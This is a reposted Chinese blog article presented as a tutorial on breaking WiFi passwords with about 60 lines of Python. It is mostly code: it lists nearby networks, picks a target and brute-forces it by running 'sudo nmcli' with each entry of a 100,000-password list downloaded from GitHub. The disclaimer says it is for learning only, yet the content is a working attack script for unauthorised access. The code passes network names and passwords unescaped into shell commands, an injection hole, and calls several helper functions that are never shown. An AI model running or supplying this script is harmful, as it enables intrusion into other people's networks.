查看原文
其他

解锁WiFi密码,我只用了60行代码....

The following article is from 平凡而诗意 Author Jackpop

(给程序员零距离加星标,了解项目开发.)

WiFi现在已经遍布我们生活方方面面,如今,如论到工作单位,还是租住的房子,或者一家餐厅,随处都可以连上WiFi。

因此,我们对WiFi密码的需求也没有之前那么迫切了。

如何破解WiFi密码?

本文,将会通过Python教大家如何实现,这里纯粹是为了学习用途。

1. WiFi列表

首先,我们需要获取附近的WiFi列表。

下面,就来写一个函数来获取附近的WiFi列表,函数命名为display_targets

def display_targets(networks, security_type):
print("Select a target: \n")

rows, columns = os.popen('stty size', 'r').read().split()
for i in range(len(networks)):
width = len(str(str(i+1)+". "+networks[i]+security_type[i]))+2
spacer = " "

if (int(columns) >= 100):
calc = int((int(columns)-int(width))*0.75)
else:
calc = int(columns)-int(width)

for index in range(calc):
spacer += "."
if index == (calc-1):
spacer += " "

print(str(i+1)+". "+networks[i]+spacer+security_type[i])

这里,我们会用到ssid工具包,用来获取附近的WiFi列表,存入到参数networks

2. 选择WiFi

获取WiFi列表之后,下一步要做的就是选择我们想要连接的WiFi,

def prompt_for_target_choice(max):
while True:
try:
selected = int(input("\nEnter number of target: "))
if(selected >= 1 and selected <= max):
return selected - 1
except Exception as e:
ignore = e

print("Invalid choice: Please pick a number between 1 and " + str(max))

这里很简单,就是一些通用的Python功能。

3. 暴力破解

目前已经获取并且选择了想要连接的WiFi,那么如何获取到它的密码呢?

这里要用到一种比较常见的方式:暴力破解

这里,要用到Github上一个项目,它收集了最常用的10万个WiFi密码。我们就用着10万个密码暴力解锁WiFi即可。

def brute_force(selected_network, passwords, args):
for password in passwords:
# necessary due to NetworkManager restart after unsuccessful attempt at login
password = password.strip()

# when when obtain password from url we need the decode utf-8 however we doesnt when reading from file
if isinstance(password, str):
decoded_line = password
else:
decoded_line = password.decode("utf-8")

if args.verbose is True:
print(bcolors.HEADER+"** TESTING **: with password '" +
decoded_line+"'"+bcolors.ENDC)

if (len(decoded_line) >= 8):
time.sleep(3)

creds = os.popen("sudo nmcli dev wifi connect " +
selected_network+" password "+decoded_line).read()

# print(creds)

if ("Error:" in creds.strip()):
if args.verbose is True:
print(bcolors.FAIL+"** TESTING **: password '" +
decoded_line+"' failed."+bcolors.ENDC)
else:
sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" +
decoded_line+"' succeeded."+bcolors.ENDC)
else:
if args.verbose is True:
print(bcolors.OKCYAN+"** TESTING **: password '" +
decoded_line+"' too short, passing."+bcolors.ENDC)

print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)

核心功能3个函数就完成了,只用了60行Python代码!

下面就把它们串联在一起:

def main():
require_root()
args = argument_parser()

# The user chose to supplied their own url
if args.url is not None:
passwords = fetch_password_from_url(args.url)
# user elect to read passwords form a file
elif args.file is not None:
file = open(args.file, "r")
passwords = file.readlines()
if not passwords:
print("Password file cannot be empty!")
exit(0)
file.close()
else:
# fallback to the default list as the user didnt supplied a password list
default_url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt"
passwords = fetch_password_from_url(default_url)

# grabbing the list of the network ssids
func_call = start(1)
networks = func_call[0]
security_type = func_call[1]

if not networks:
print("No networks found!")
sys.exit(-1)

display_targets(networks, security_type)
max = len(networks)
pick = prompt_for_target_choice(max)
target = networks[pick]

print("\nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.")

brute_force(target, passwords, args)

执行函数,就会在命令行下显示附近的WiFi列表,选择之后就开始逐个尝试密码。

不同的颜色代表不同不同的结果:

  • 红色:测试失败
  • 绿色:破解成功
  • 紫色:测试中

现在,是不是发现这个看上去很复杂的事情变得简单许多?

- END -

1、报警了!Github 是不是想要抢我饭碗...2、漫画:什么是 “元宇宙” ?3、要是没有差点“被”下架的QQ秀,腾讯可能会死在2003年。4、大忽悠!“扫码赢iPhone”?千万别信!5、Chrome 新功能:支持录制、重放和测试用户操作!6、午夜0:00,你有多爽,我就有多酸爽...7、恭喜!EDA冠军!全球第一!
8、一个价值8.7亿刀的bug


更多精彩等待你的发现点分享点点赞点在看

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存